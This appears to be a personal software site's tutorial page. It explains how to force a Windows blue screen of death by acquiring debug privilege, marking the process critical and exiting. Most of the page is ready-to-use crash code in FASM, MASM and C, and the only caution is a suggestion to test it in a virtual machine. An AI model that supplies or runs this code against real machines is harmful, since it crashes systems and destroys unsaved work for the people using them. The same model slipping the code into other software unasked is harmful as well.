Home
News
Contact
HowFast
Leetspeak
Literay
PortWalker
WinKeyfinder
VirtualGL
Litex CMS
Seeker
xLoad
BSOD
This article will describe how to produce a blue screen of death on any Windows operating system using FASM/MASM.
Notice: If you want to test this, consider using a virtual machine instead of a productive system.
How it works
It is pretty simple. The whole procedure contains 3 steps:
- Get Debug privileges. Therefore we take use of SeDebugPrivilege
- Set the current process to critical
- ExitProcess will terminate our process.
And because we have a 'critical process', which is meant to be used for driver purposes we can not terminate it without making it non-critical again. Doing so will result in a blue screen!
The executable size of the MASM version is only 1024 bytes, so pretty small. Check out the source code snippets or download the source code.
Source-Code in FASM (1 KB):
format PE GUI 4.0
include 'win32a.inc'
lea eax, [esp+20]
invoke RtlAdjustPrivilege, 20, 1, 0, eax
invoke RtlSetProcessIsCritical, 1, 0, 0
invoke ExitProcess, 0
data import
library \
kernel32, 'kernel32', \
ntdll, 'ntdll'
import kernel32, \
ExitProcess, 'ExitProcess'
import ntdll, \
RtlAdjustPrivilege, 'RtlAdjustPrivilege', \
RtlSetProcessIsCritical, 'RtlSetProcessIsCritical'
end data
Source-Code in MASM (1 KB):
.386
.model flat, stdcall
option casemap :none
ExitProcess PROTO :DWORD
RtlAdjustPrivilege PROTO :DWORD,:DWORD,:DWORD,:DWORD
RtlSetProcessIsCritical PROTO :DWORD,:DWORD,:DWORD
includelib \masm32\lib\kernel32.lib
includelib ntdll.lib
.code
start:
lea eax, [esp+20]
invoke RtlAdjustPrivilege, 20, 1, 0, eax
invoke RtlSetProcessIsCritical, 1, 0, 0
invoke ExitProcess, 0
end start
Equivalent Source-Code in C (1.5 KB compiled with tcc)
int main()
{
int e = 0;
RtlAdjustPrivilege(20, 1, 0, &e);
RtlSetProcessIsCritical(1, 0, 0);
ExitProcess();
}